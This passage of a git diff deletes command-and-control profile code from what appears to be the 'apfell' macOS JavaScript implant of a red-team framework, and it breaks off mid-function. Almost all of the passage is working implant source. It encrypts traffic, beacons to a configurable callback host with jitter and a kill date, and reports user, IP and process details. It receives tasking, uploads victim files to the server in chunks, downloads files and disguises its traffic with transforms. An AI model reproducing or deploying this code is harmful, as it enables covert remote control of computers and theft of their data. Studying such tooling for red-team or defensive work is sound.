if(this.aes_psk !== ""){ - this.parameters = 
$.CFDictionaryCreateMutable($.kCFAllocatorDefault, 0, $.kCFTypeDictionaryKeyCallBacks, $.kCFTypeDictionaryValueCallBacks); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyType, $.kSecAttrKeyTypeAES); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeySizeInBits, $.kSecAES256); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyClass, $.kSecAttrKeyClassSymmetric); - $.CFDictionarySetValue(this.parameters, $.kSecClass, $.kSecClassKey); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - let err = Ref(); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, err); - } - this.using_key_exchange = "encrypted_exchange_check" === "T"; - this.exchanging_keys = this.using_key_exchange; - if("killdate" !== "yyyy-mm-dd" && "killdate" !== ""){ - this.dateFormatter = $.NSDateFormatter.alloc.init; - this.dateFormatter.setDateFormat("yyyy-MM-dd"); - this.kill_date = this.dateFormatter.dateFromString('killdate'); - }else{ - this.kill_date = $.NSDate.distantFuture; - } - } - get_random_int(max) { - return Math.floor(Math.random() * Math.floor(max + 1)); - } - gen_sleep_time(){ - //generate a time that's this.interval += (this.interval * 1/this.jitter) - if(this.jitter < 1){return this.interval;} - let plus_min = this.get_random_int(1); - if(plus_min === 1){ - return this.interval + (this.interval * (this.get_random_int(this.jitter)/100)); - }else{ - return this.interval - (this.interval * (this.get_random_int(this.jitter)/100)); - } - } - encrypt_message(uid, data){ - // takes in the string we're about to send, encrypts it, and returns a new string - let err = Ref(); - let encrypt = $.SecEncryptTransformCreate(this.cryptokey,err); - let b = $.SecTransformSetAttribute(encrypt, $("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - b= $.SecTransformSetAttribute(encrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - - //generate a random IV to use - let IV = $.NSMutableData.dataWithLength(16); - $.SecRandomCopyBytes($.kSecRandomDefault, 16, IV.bytes); - b = $.SecTransformSetAttribute(encrypt, $("SecIVKey"), IV, err); - // set our data to be encrypted - let nsdata = $(data).dataUsingEncoding($.NSUTF8StringEncoding); - b=$.SecTransformSetAttribute(encrypt, $.kSecTransformInputAttributeName, nsdata, err); - //$.CFShow(err[0]); - let encryptedData = $.SecTransformExecute(encrypt, err); - // now we need to prepend the IV to the encrypted data before we base64 encode and return it - //generate the hmac - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - let hmac_input = $.NSMutableData.dataWithLength(0); - hmac_input.appendData(IV); - hmac_input.appendData(encryptedData); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecTransformInputAttributeName, hmac_input, err); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - - let final_message = $.NSMutableData.dataWithLength(0); - final_message.appendData( $(uid).dataUsingEncoding($.NSUTF8StringEncoding) ); - final_message.appendData(IV); - final_message.appendData(encryptedData); - final_message.appendData(hmac_data); - return final_message.base64EncodedStringWithOptions(0); - } - decrypt_message(nsdata){ - //takes in a base64 encoded string to be decrypted and returned - //console.log("called decrypt"); - let err = Ref(); - let decrypt = $.SecDecryptTransformCreate(this.cryptokey, err); - $.SecTransformSetAttribute(decrypt, 
$("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - $.SecTransformSetAttribute(decrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - //console.log("making ranges"); - //need to extract out the first 16 bytes as the IV and the rest is the message to decrypt - let iv_range = $.NSMakeRange(0, 16); - let message_range = $.NSMakeRange(16, nsdata.length - 48); // 16 for IV 32 for hmac - let hmac_range = $.NSMakeRange(nsdata.length - 32, 32); - let hmac_data_range = $.NSMakeRange(0, nsdata.length - 32); // hmac includes IV + ciphertext - //console.log("carving out iv"); - let iv = nsdata.subdataWithRange(iv_range); - $.SecTransformSetAttribute(decrypt, $("SecIVKey"), iv, err); - let message = nsdata.subdataWithRange(message_range); - $.SecTransformSetAttribute(decrypt, $("INPUT"), message, err); - // create an hmac and verify it matches - let message_hmac = nsdata.subdataWithRange(hmac_range); - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - $.SecTransformSetAttribute(hmac_transform, $.kSecTransformInputAttributeName, nsdata.subdataWithRange(hmac_data_range), err); - $.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - if(hmac_data.isEqualToData(message_hmac)){ - let decryptedData = $.SecTransformExecute(decrypt, Ref()); - //console.log("making a string from the message"); - let decrypted_message = $.NSString.alloc.initWithDataEncoding(decryptedData, $.NSUTF8StringEncoding); - //console.log(decrypted_message.js); - return decrypted_message; - } - else{ - return undefined; - } - } - negotiate_key(){ - // Generate a public/private key pair - let parameters = $({"type": $("42"), "bsiz": 4096, "perm": false}); - let err = Ref(); - let privatekey = $.SecKeyCreateRandomKey(parameters, err); - //console.log("generated new key"); - let publickey = $.SecKeyCopyPublicKey(privatekey); - let exported_public = $.SecKeyCopyExternalRepresentation(publickey, err); - //$.CFShow($.CFMakeCollectable(err[0])); - try{ - //this is the catalina case - let b64_exported_public = $.CFMakeCollectable(exported_public); - b64_exported_public = b64_exported_public.base64EncodedStringWithOptions(0).js; // get a base64 encoded string version - exported_public = b64_exported_public; - }catch(error){ - //this is the mojave and high sierra case - exported_public = exported_public.base64EncodedStringWithOptions(0).js; - } - let s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; - let session_key = Array(20).join().split(',').map(function() { return s.charAt(Math.floor(Math.random() * s.length)); }).join(''); - let initial_message = {"session_id": session_key, "pub_key": exported_public, "action": "staging_rsa"}; - // Encrypt our initial message with sessionID and Public key with the initial AES key - while(true){ - try{ - let stage1 = this.htmlPostData(initial_message, apfell.uuid); - let enc_key = $.NSData.alloc.initWithBase64Encoding(stage1['session_key']); - let dec_key = $.SecKeyCreateDecryptedData(privatekey, $.kSecKeyAlgorithmRSAEncryptionOAEPSHA1, enc_key, err); - // Adjust our global key information with the newly adjusted session key - try{ - this.aes_psk = dec_key.base64EncodedStringWithOptions(0).js; // base64 encoded key - }catch(error){ - let dec_key_collectable = $.CFMakeCollectable(dec_key); - dec_key_collectable = dec_key_collectable.base64EncodedStringWithOptions(0).js; - this.aes_psk = 
dec_key_collectable; - } - //console.log(JSON.stringify(json_response)); - this.parameters = $({"type": $.kSecAttrKeyTypeAES}); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, Ref()); - this.exchanging_keys = false; - return stage1['uuid']; - }catch(error){ - console.log(error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - getConfig(){ - //A RESTful base config consists of the following: - // BaseURL (includes Port), CallbackInterval, KillDate (not implemented yet) - let config = { - "C2": { - "baseurl": this.baseurl, - "interval": this.interval, - "jitter": this.jitter, - "commands": this.commands.join(", "), - "api_version": this.api_version, - "host_header": this.host_header, - "aes_psk": this.aes_psk - }, - "Host": { - "user": apfell.user, - "fullName": apfell.fullName, - "ips": apfell.ip, - "hosts": apfell.host, - "environment": apfell.environment, - "uptime": apfell.uptime, - "args": apfell.args, - "pid": apfell.pid, - "apfell_id": apfell.id, - "payload_id": apfell.uuid - }}; - return JSON.stringify(config, null, 2); - } - checkin(ip, pid, user, host, os, arch, domain){ - //get info about system to check in initially - //needs IP, PID, user, host, payload_type - let info = {'ip':ip,'pid':pid,'user':user,'host':host,'uuid':apfell.uuid, "os":os, "architecture": arch, "domain": domain, "action": "checkin"}; - if(user === "root"){ - info['integrity_level'] = 3; - } - //calls htmlPostData(url,data) to actually checkin - //Encrypt our data - //gets back a unique ID - if(this.using_key_exchange){ - let sessionID = this.negotiate_key(); - //console.log("got session ID: " + sessionID); - var jsondata = this.htmlPostData(info, sessionID); - }else{ - var jsondata = this.htmlPostData(info, apfell.uuid); - } - apfell.id = jsondata.id; - // if we fail to get a new ID number, then exit the application - if(apfell.id === undefined){ $.NSApplication.sharedApplication.terminate(this); } - //console.log(apfell.id); - return jsondata; - } - getTasking(){ - while(true){ - try{ - //let data = {"tasking_size":1, "action": "get_tasking"}; - //let task = this.htmlPostData(this.url, data, apfell.id); - let task = this.htmlGetData(); - //console.log("tasking got back: " + JSON.stringify(task)); - return task['tasks']; - } - catch(error){ - //console.log(error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - postResponse(task, output){ - // this will get the task object and the response output - return this.postRESTResponse(output, task.id); - } - postRESTResponse(data, tid){ - //depending on the amount of data we're sending, we might need to chunk it - data["task_id"] = tid; - let postData = {"action": "post_response", "responses": [data]}; - return this.htmlPostData(postData, apfell.id); - } - htmlPostData(sendData, uid, json=true){ - let url = this.baseurl; - if(this.postURI !== ""){ url += "/" + this.postURI;} - //console.log(url); - //encrypt our information before sending it - let data; - if(this.aes_psk !== ""){ - data = this.encrypt_message(uid, JSON.stringify(sendData)); - }else if(typeof(sendData) === "string"){ - data = $(uid + sendData).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0); - }else{ - data = $(uid + JSON.stringify(sendData)).dataUsingEncoding($.NSUTF8StringEncoding); - data = 
data.base64EncodedStringWithOptions(0); - } - while(true){ - try{ //for some reason it sometimes randomly fails to send the data, throwing a JSON error. loop to fix for now - //console.log("posting: " + sendData + " to " + urlEnding); - if( $.NSDate.date.compare(this.kill_date) === $.NSOrderedDescending ){ - $.NSApplication.sharedApplication.terminate(this); - } - if( (apfell.id === undefined || apfell.id === "") && (uid === undefined || uid === "")){ $.NSApplication.sharedApplication.terminate(this);} - let req = $.NSMutableURLRequest.alloc.initWithURL($.NSURL.URLWithString(url)); - req.setHTTPMethod($.NSString.alloc.initWithUTF8String("POST")); - let postData = data.dataUsingEncodingAllowLossyConversion($.NSString.NSASCIIStringEncoding, true); - let postLength = $.NSString.stringWithFormat("%d", postData.length); - req.addValueForHTTPHeaderField(postLength, $.NSString.alloc.initWithUTF8String('Content-Length')); - if( this.host_header.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.host_header), $.NSString.alloc.initWithUTF8String("Host")); - } - if (this.user_agent.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.user_agent), $.NSString.alloc.initWithUTF8String("User-Agent")); - } - req.setHTTPBody(postData); - let response = Ref(); - let error = Ref(); - let session_config = $.NSURLSessionConfiguration.ephemeralSessionConfiguration; - session_config.connectionProxyDictionary = $(this.proxy_dict); - let session = $.NSURLSession.sessionWithConfiguration(session_config); - let finished = false; - let responseData; - session.dataTaskWithRequestCompletionHandler(req, (data, resp) => { - finished = true; - responseData = data; - }).resume; - while(!finished){ - delay(0.1); - } - //responseData is base64(UUID + data) - if( responseData.length < 36){ - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - let resp = $.NSData.alloc.initWithBase64Encoding(responseData); - //let uuid_range = $.NSMakeRange(0, 36); - let message_range = $.NSMakeRange(36, resp.length - 36); - //let uuid = $.NSString.alloc.initWithDataEncoding(resp.subdataWithRange(uuid_range), $.NSUTF8StringEncoding).js; - resp = resp.subdataWithRange(message_range); //could either be plaintext json or encrypted bytes - //we're not doing the initial key exchange - if(this.aes_psk !== ""){ - //if we do need to decrypt the response though, do that - if(json){ - resp = ObjC.unwrap(this.decrypt_message(resp)); - return JSON.parse(resp); - }else{ - return this.decrypt_message(resp); - } - }else{ - //we don't need to decrypt it, so we can just parse and return it - if(json){ - return JSON.parse(ObjC.deepUnwrap($.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding))); - }else{ - return $.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding).js; - } - } - } - catch(error){ - //console.log(error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - htmlGetData(){ - let data = {"tasking_size":1, "action": "get_tasking"}; - if(this.aes_psk !== ""){ - data = this.encrypt_message(apfell.id, JSON.stringify(data)).js; - }else{ - data = $(apfell.id + JSON.stringify(data)).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0).js; - } - let NSCharacterSet = $.NSCharacterSet.characterSetWithCharactersInString("/+=\n").invertedSet; - data = $(data).stringByAddingPercentEncodingWithAllowedCharacters(NSCharacterSet).js; 
- let url = this.baseurl; - if(this.getURI !== ""){ url += "/" + this.getURI; } - url += "?" + this.queryPathName + "=" + data; - while(true){ - try{ - if( $.NSDate.date.compare(this.kill_date) === $.NSOrderedDescending ){ - $.NSApplication.sharedApplication.terminate(this); - } - if(apfell.id === undefined || apfell.id === ""){ $.NSApplication.sharedApplication.terminate(this);} - let req = $.NSMutableURLRequest.alloc.initWithURL($.NSURL.URLWithString(url)); - req.setHTTPMethod($.NSString.alloc.initWithUTF8String("GET")); - if( this.host_header.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.host_header), $.NSString.alloc.initWithUTF8String("Host")); - } - if (this.user_agent.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.user_agent), $.NSString.alloc.initWithUTF8String("User-Agent")); - } - let response = Ref(); - let error = Ref(); - let session_config = $.NSURLSessionConfiguration.ephemeralSessionConfiguration; - session_config.connectionProxyDictionary = $(this.proxy_dict); - let session = $.NSURLSession.sessionWithConfiguration(session_config); - let finished = false; - let responseData; - session.dataTaskWithRequestCompletionHandler(req, (data, resp) => { - finished = true; - responseData = data; - }).resume; - while(!finished){ - delay(0.1); - } - if(responseData.length < 36){ - //this means we likely got back some form of error or redirect message, not our actual data - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - let resp = $.NSData.alloc.initWithBase64Encoding(responseData); - //let uuid_range = $.NSMakeRange(0, 36); - let message_range = $.NSMakeRange(36, resp.length - 36); - //let uuid = $.NSString.alloc.initWithDataEncoding(resp.subdataWithRange(uuid_range), $.NSUTF8StringEncoding).js; - resp = resp.subdataWithRange(message_range); //could either be plaintext json or encrypted bytes - //we're not doing the initial key exchange - if(this.aes_psk !== ""){ - //if we do need to decrypt the response though, do that - resp = ObjC.unwrap(this.decrypt_message(resp)); - return JSON.parse(resp); - }else{ - //we don't need to decrypt it, so we can just parse and return it - return JSON.parse(ObjC.deepUnwrap($.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding))); - } - } - catch(error){ - //console.log("error in htmlGetData: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); //wait timeout seconds and try again - } - } - } - download(task, params){ - // download just has one parameter of the path of the file to download - let output = ""; - if( does_file_exist(params) ){ - let offset = 0; - let chunkSize = 512000; //3500; - // get the full real path to the file - let full_path = params; - try{ - let fm = $.NSFileManager.defaultManager; - let pieces = ObjC.deepUnwrap(fm.componentsToDisplayForPath(params)); - full_path = "/" + pieces.slice(1).join("/"); - var handle = $.NSFileHandle.fileHandleForReadingAtPath(full_path); - // Get the file size by seeking; - var fileSize = handle.seekToEndOfFile; - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), 'completed': true}; - } - // always round up to account for chunks that are < chunksize; - let numOfChunks = Math.ceil(fileSize / chunkSize); - let registerData = {'total_chunks': numOfChunks, 'full_path': full_path}; - let registerFile = this.postResponse(task, registerData); - registerFile = registerFile['responses'][0]; - if (registerFile['status'] === "success"){ - 
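// [Editor's note: descriptive comment, not part of the original diff.] The block below
// implements the chunked download flow: the file was just registered with
// {total_chunks, full_path} via postResponse() and the server answered with a file_id;
// the loop now reads the file 512000 bytes at a time, posts
// {chunk_num, chunk_data (base64), file_id} for each read, and advances the file offset
// by the number of bytes actually read. Worked example: a 1,300,000-byte file yields
// Math.ceil(1300000 / 512000) = 3 chunks of 512000, 512000 and 276000 bytes,
// sent as chunk_num 1 through 3.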
handle.seekToFileOffset(0); - let currentChunk = 1; - let data = handle.readDataOfLength(chunkSize); - while(parseInt(data.length) > 0 && offset < fileSize){ - // send a chunk - let fileData = {'chunk_num': currentChunk, 'chunk_data': data.base64EncodedStringWithOptions(0).js,'file_id': registerFile['file_id']}; - this.postResponse(task, fileData); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - // increment the offset and seek to the amount of data read from the file - offset += parseInt(data.length); - handle.seekToFileOffset(offset); - currentChunk += 1; - data = handle.readDataOfLength(chunkSize); - } - output = {"completed":true, "file_id": registerFile['file_id']}; - } - else{ - output = {'status': 'error', 'user_output': "Failed to register file to download", 'completed': true}; - } - } - else{ - output = {'status': 'error', 'user_output': "file does not exist", 'completed': true}; - } - return output; - } - upload(task, file_id, full_path){ - try{ - let data = {"action": "upload", "file_id": file_id, "chunk_size": 512000, "chunk_num": 1, "full_path": full_path, "task_id": task.id}; - let chunk_num = 1; - let total_chunks = 1; - let total_data = $.NSMutableData.dataWithLength(0); - do{ - let file_data = this.htmlPostData(data, apfell.id); - if(file_data['chunk_num'] === 0){ - return "error from server"; - } - chunk_num = file_data['chunk_num']; - total_chunks = file_data['total_chunks']; - total_data.appendData($.NSData.alloc.initWithBase64Encoding($(file_data['chunk_data']))); - data = {"action": "upload", "file_id": file_id, "chunk_size": 512000, "chunk_num": chunk_num + 1, "task_id": task.id}; - }while(chunk_num < total_chunks); - return total_data; - }catch(error){ - return error.toString(); - } - } -} -//------------- INSTANTIATE OUR C2 CLASS BELOW HERE IN MAIN CODE----------------------- -ObjC.import('Security'); -var C2 = new customC2(callback_interval, "callback_host", "callback_port"); \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/c2_profiles/dynamicHTTP.js b/Payload_Types/apfell/agent_code/c2_profiles/dynamicHTTP.js deleted file mode 100644 index 3d71cbee1..000000000 --- a/Payload_Types/apfell/agent_code/c2_profiles/dynamicHTTP.js +++ /dev/null @@ -1,526 +0,0 @@ -//-------------RESTFUL C2 mechanisms --------------------------------- -class customC2 extends baseC2{ - - constructor(interval, baseurl){ - super(interval, baseurl); - this.commands = []; - this.c2_config = raw_c2_config; - this.get_messages = this.c2_config['GET']['AgentMessage']; - this.post_messages = this.c2_config['POST']['AgentMessage']; - this.interval = this.c2_config['interval']; - this.chunk_size = this.c2_config['chunk_size']; - this.jitter = this.c2_config['jitter']; - this.aes_psk = "AESPSK"; // base64 encoded key - if(this.aes_psk !== ""){ - this.parameters = $.CFDictionaryCreateMutable($.kCFAllocatorDefault, 0, $.kCFTypeDictionaryKeyCallBacks, $.kCFTypeDictionaryValueCallBacks); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyType, $.kSecAttrKeyTypeAES); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeySizeInBits, $.kSecAES256); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyClass, $.kSecAttrKeyClassSymmetric); - $.CFDictionarySetValue(this.parameters, $.kSecClass, $.kSecClassKey); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - let err = Ref(); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, err); - } - this.using_key_exchange = this.c2_config['key_exchange']; - this.exchanging_keys = 
this.using_key_exchange; - this.dateFormatter = $.NSDateFormatter.alloc.init; - this.dateFormatter.setDateFormat("yyyy-MM-dd"); - if(this.c2_config['kill_date'] !== undefined && this.c2_config['kill_date'] !== ""){ - this.kill_date = this.dateFormatter.dateFromString(this.c2_config['kill_date']); - }else{ - this.kill_date = $.NSDate.distantFuture; - } - } - get_random_element(x){ - return x[Math.floor(Math.random() * x.length)]; - } - encrypt_message(uid, data){ - // takes in the string we're about to send, encrypts it, and returns a new string - let err = Ref(); - let encrypt = $.SecEncryptTransformCreate(this.cryptokey,err); - let b = $.SecTransformSetAttribute(encrypt, $("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - b= $.SecTransformSetAttribute(encrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - - //generate a random IV to use - let IV = $.NSMutableData.dataWithLength(16); - $.SecRandomCopyBytes($.kSecRandomDefault, 16, IV.bytes); - b = $.SecTransformSetAttribute(encrypt, $("SecIVKey"), IV, err); - // set our data to be encrypted - let nsdata = $(data).dataUsingEncoding($.NSUTF8StringEncoding); - b=$.SecTransformSetAttribute(encrypt, $.kSecTransformInputAttributeName, nsdata, err); - //$.CFShow(err[0]); - let encryptedData = $.SecTransformExecute(encrypt, err); - // now we need to prepend the IV to the encrypted data before we base64 encode and return it - //generate the hmac - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - let hmac_input = $.NSMutableData.dataWithLength(0); - hmac_input.appendData(IV); - hmac_input.appendData(encryptedData); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecTransformInputAttributeName, hmac_input, err); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - - let final_message = $.NSMutableData.dataWithLength(0); - final_message.appendData( $(uid).dataUsingEncoding($.NSUTF8StringEncoding) ); - final_message.appendData(IV); - final_message.appendData(encryptedData); - final_message.appendData(hmac_data); - return final_message.base64EncodedStringWithOptions(0); - } - decrypt_message(nsdata){ - //takes in a base64 encoded string to be decrypted and returned - //console.log("called decrypt"); - let err = Ref(); - let decrypt = $.SecDecryptTransformCreate(this.cryptokey, err); - $.SecTransformSetAttribute(decrypt, $("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - $.SecTransformSetAttribute(decrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - //console.log("making ranges"); - //need to extract out the first 16 bytes as the IV and the rest is the message to decrypt - let iv_range = $.NSMakeRange(0, 16); - let message_range = $.NSMakeRange(16, nsdata.length - 48); // 16 for IV 32 for hmac - let hmac_range = $.NSMakeRange(nsdata.length - 32, 32); - let hmac_data_range = $.NSMakeRange(0, nsdata.length - 32); // hmac includes IV + ciphertext - //console.log("carving out iv"); - let iv = nsdata.subdataWithRange(iv_range); - $.SecTransformSetAttribute(decrypt, $("SecIVKey"), iv, err); - let message = nsdata.subdataWithRange(message_range); - $.SecTransformSetAttribute(decrypt, $("INPUT"), message, err); - // create an hmac and verify it matches - let message_hmac = nsdata.subdataWithRange(hmac_range); - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - $.SecTransformSetAttribute(hmac_transform, 
$.kSecTransformInputAttributeName, nsdata.subdataWithRange(hmac_data_range), err); - $.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - if(hmac_data.isEqualToData(message_hmac)){ - let decryptedData = $.SecTransformExecute(decrypt, Ref()); - //console.log("making a string from the message"); - let decrypted_message = $.NSString.alloc.initWithDataEncoding(decryptedData, $.NSUTF8StringEncoding); - //console.log(decrypted_message.js); - return decrypted_message; - } - else{ - return undefined; - } - } - negotiate_key(){ - // Generate a public/private key pair - let parameters = $({"type": $("42"), "bsiz": 4096, "perm": false}); - let err = Ref(); - let privatekey = $.SecKeyCreateRandomKey(parameters, err); - //console.log("generated new key"); - let publickey = $.SecKeyCopyPublicKey(privatekey); - let exported_public = $.SecKeyCopyExternalRepresentation(publickey, err); - //$.CFShow($.CFMakeCollectable(err[0])); - try{ - //this is the catalina case - let b64_exported_public = $.CFMakeCollectable(exported_public); - b64_exported_public = b64_exported_public.base64EncodedStringWithOptions(0).js; // get a base64 encoded string version - exported_public = b64_exported_public; - }catch(error){ - //this is the mojave and high sierra case - exported_public = exported_public.base64EncodedStringWithOptions(0).js; - } - let s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; - let session_key = Array(20).join().split(',').map(function() { return s.charAt(Math.floor(Math.random() * s.length)); }).join(''); - let initial_message = {"session_id": session_key, "pub_key": exported_public, "action": "staging_rsa"}; - // Encrypt our initial message with sessionID and Public key with the initial AES key - while(true){ - try{ - //let req = this.create_message(this.get_random_element(this.post_messages), initial_message, apfell.uuid); - //let stage1 = this.make_request(req); - let stage1 = this.make_request("POST", apfell.uuid, initial_message); - let enc_key = $.NSData.alloc.initWithBase64Encoding(stage1['session_key']); - let dec_key = $.SecKeyCreateDecryptedData(privatekey, $.kSecKeyAlgorithmRSAEncryptionOAEPSHA1, enc_key, err); - // Adjust our global key information with the newly adjusted session key - try{ - this.aes_psk = dec_key.base64EncodedStringWithOptions(0).js; // base64 encoded key - }catch(error){ - let dec_key_collectable = $.CFMakeCollectable(dec_key); - dec_key_collectable = dec_key_collectable.base64EncodedStringWithOptions(0).js; - this.aes_psk = dec_key_collectable; - } - //console.log(JSON.stringify(json_response)); - this.parameters = $({"type": $.kSecAttrKeyTypeAES}); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, Ref()); - this.exchanging_keys = false; - return stage1['uuid']; - }catch(error){ - //console.log("error in negotiate_key: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - gen_sleep_time(){ - //generate a time that's this.interval += (this.interval * 1/this.jitter) - let plus_min = Math.round(Math.random()); - if(plus_min === 1){ - return this.interval + (this.interval * (Math.round(Math.random()*this.jitter)/100)); - }else{ - return this.interval - (this.interval * (Math.round(Math.random()*this.jitter)/100)); - } - } - prepend(){ 
- return arguments[1] + arguments[0]; - } - r_prepend(){ - return arguments[0].slice(String(arguments[1]).length); - } - append(){ - return arguments[0] + arguments[1]; - } - r_append(){ - return arguments[0].slice(0, -1 * String(arguments[1]).length); - } - b64(){ - return base64_encode(String(arguments[0])); - } - r_b64(){ - return base64_decode(String(arguments[0])); - } - random_mixed(){ - let m = [...Array(Number(arguments[1]))].map(i=>(~~(Math.random()*36)).toString(36)).join(''); - return arguments[0] + m; - } - r_random_mixed(){ - return arguments[0].slice(0, -1 * Number(arguments[1])); - } - random_number(){ - let m = [...Array(Number(arguments[1]))].map(i=>(~~(Math.random()*10)).toString(10)).join(''); - return arguments[0] + m; - } - r_random_number(){ - return arguments[0].slice(0, -1 * Number(arguments[1])); - } - random_alpha(){ - let s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; - let m = Array(Number(arguments[1])).join().split(',').map(function() { return s.charAt(Math.floor(Math.random() * s.length)); }).join(''); - return arguments[0] + m; - } - r_random_alpha(){ - return arguments[0].slice(0, -1 * Number(arguments[1])); - } - choose_random(){ - let choice = Math.floor(Math.random()* arguments[1].length); - if(choice === arguments[1].length){choice -= 1;} - return arguments[0] + arguments[1][choice]; - } - r_choose_random(){ - for(let i = 0; i < arguments[1].length; i++){ - if(arguments[0].includes(arguments[1][i])){ - return arguments[0].replace(arguments[1][i], ""); - } - } - return arguments[0]; - } - get_value(value, transforms){ - let tmp = value; - try { - if (transforms.length > 0) { - for (let i = transforms.length - 1; i >= 0; i--) { - switch (transforms[i]['function']) { - case "base64": - tmp = this.r_b64(tmp); - break; - case "prepend": - tmp = this.r_prepend(tmp, transforms[i]['parameters']); - break; - case "append": - tmp = this.r_append(tmp, transforms[i]['parameters']); - break; - case "random_mixed": - tmp = this.r_random_mixed(tmp, transforms[i]['parameters']); - break; - case "random_number": - tmp = this.r_random_number(tmp, transforms[i]['parameters']); - break; - case "random_alpha": - tmp = this.r_random_alpha(tmp, transforms[i]['parameters']); - break; - case "choose_random": - tmp = this.r_choose_random(tmp, transforms[i]['parameters']); - } - } - } - return tmp; - }catch(error){ - return ""; - } - } - retrieve_message(response, method="POST"){ - let data = this.get_value(($.NSString.alloc.initWithDataEncoding(response, $.NSUTF8StringEncoding)).js, this.c2_config[method]['ServerBody']); - //console.log("in retrieve_message, returning: " + data); - return data; - } - create_value(value, transforms){ - for(let i = 0; i < transforms.length; i++){ - switch(transforms[i]['function']){ - case "base64": - value = this.b64(value); - break; - case "prepend": - value = this.prepend(value, transforms[i]['parameters']); - break; - case "append": - value = this.append(value, transforms[i]['parameters']); - break; - case "random_mixed": - value = this.random_mixed(value, transforms[i]['parameters']); - break; - case "random_number": - value = this.random_number(value, transforms[i]['parameters']); - break; - case "random_alpha": - value = this.random_alpha(value, transforms[i]['parameters']); - break; - case "choose_random": - value = this.choose_random(value, transforms[i]['parameters']); - } - } - return value; - } - create_message(endpoint, data, agent_id=apfell.id, method="POST"){ - if(this.aes_psk !== ""){ - data = 
